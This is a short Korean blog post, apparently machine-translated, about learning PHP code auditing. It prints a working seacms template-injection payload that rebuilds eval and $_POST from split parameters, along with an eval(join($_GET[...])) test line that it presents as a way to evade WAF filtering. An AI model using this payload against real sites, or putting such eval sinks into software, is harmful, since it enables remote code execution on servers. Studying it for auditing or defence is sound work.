최근에 PHP 감사를 배우기 시작했는데, seacms를 공부하던 중에 페이로드에서 이상한 점을 발견했습니다.
searchtype=5&searchword={ if{searchpage:year}&year=:e{searchpage:area} }&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
해본 결과 데이터를 수신할 때 다음과 같은 사실을 발견했습니다. 예:
키 이름 = a, 그러면 pass a[ ]=a&a[]=b, a는 배열이므로 테스트를 해보니 과연
서버측 테스트 코드
<?php print_r($_GET[1]); ?>
테스트 결과는 다음과 같습니다
그럼 이 모직물의 용도는 무엇입니까? 생각해 보니 서버에 보안견이나 WAF 등의 보호 도구가 있다면 조인 기능 등 다른 PHP 기능을 사용하면 우회 효과를 얻을 수도 있다
간단한 아이디어 제공
서버 테스트 코드
<?php eval(join($_GET[123])); ?>
테스트 결과는 다음과 같습니다
위 내용은 PHP가 http 요청을 통해 배열을 보내는 방법에 대한 공유 예의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!